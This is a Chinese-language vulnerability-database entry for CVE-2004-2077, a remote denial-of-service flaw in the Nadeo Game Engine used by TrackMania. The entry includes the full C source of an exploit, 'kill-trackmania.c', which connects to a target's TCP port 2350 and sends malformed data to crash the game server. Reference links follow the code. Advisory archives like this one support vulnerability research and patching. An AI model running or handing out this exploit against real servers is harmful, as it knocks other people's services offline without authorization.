Nadeo Game Engine远程拒绝服务漏洞

Nadeo Game Engine远程拒绝服务漏洞

漏洞ID 1107703 漏洞类型 其他
发布时间 2004-02-09 更新时间 2005-10-20
图片[1]-Nadeo Game Engine远程拒绝服务漏洞-安全小百科CVE编号 CVE-2004-2077
图片[2]-Nadeo Game Engine远程拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200402-033
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/23662
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200402-033
|漏洞详情
NadeoTrackMania和NadeoVirtualSkipper3版本的NadeoGameEngine存在漏洞。远程攻击者借助到TCP2350端口的畸形数据导致服务拒绝(服务器崩溃),该漏洞可能取决于长值或者错误的大小字段。
|漏洞EXP
source: http://www.securityfocus.com/bid/9604/info

It has been reported that Nadeo Game Engine may be prone to a remote denial of service vulnerability that could allow an attacker to cause the software to crash or hang by sending arbitrary data to the software on TCP port 2350.

Nadeo Trackmania demo version has been reported to be affected by this issue.

/*
* [kill-trackmania.c]
* A remote DoS that affects the Trackmania game server
*
* by Scrap
* [email protected]
* http://www.securiteinfo.com
*
* gcc kill-trackmania.c -o kill-trackmania -O2
*
*/

#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
int sock;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
char buffer[1024];
unsigned long counter;

printf("n [kill-trackmania.c] by Scrap / Securiteinfo.comn");

if (argc<2)

{
printf("Usage: %s targetnn",argv[0]);
exit(0);
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}

start=inet_addr(argv[1]);
counter=ntohl(start);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(2350);

if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
exit(0);
}
printf("nt Sending Bomb... n");
send(sock, "Bomb from Securiteinfo.comnn",17,0);
close(sock);

printf("t Bomb sent...n");

}
|参考资料

来源:XF
名称:trackmania-dos(15081)
链接:http://xforce.iss.net/xforce/xfdb/15081
来源:BID
名称:9604
链接:http://www.securityfocus.com/bid/9604
来源:BUGTRAQ
名称:20040209Re:TrackManiaDemoDenialofService
链接:http://www.securityfocus.com/archive/1/353226
来源:BUGTRAQ
名称:20040208TrackManiaDemoDenialofService
链接:http://www.securityfocus.com/archive/1/353182
来源:www.securiteinfo.com
链接:http://www.securiteinfo.com/attaques/hacking/trackmaniados.shtml

相关推荐: SCO Unixware pis/mkpis Symbolic Link Vulnerability

SCO Unixware pis/mkpis Symbolic Link Vulnerability 漏洞ID 1104436 漏洞类型 Origin Validation Error 发布时间 1999-12-27 更新时间 1999-12-27 CVE编号…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享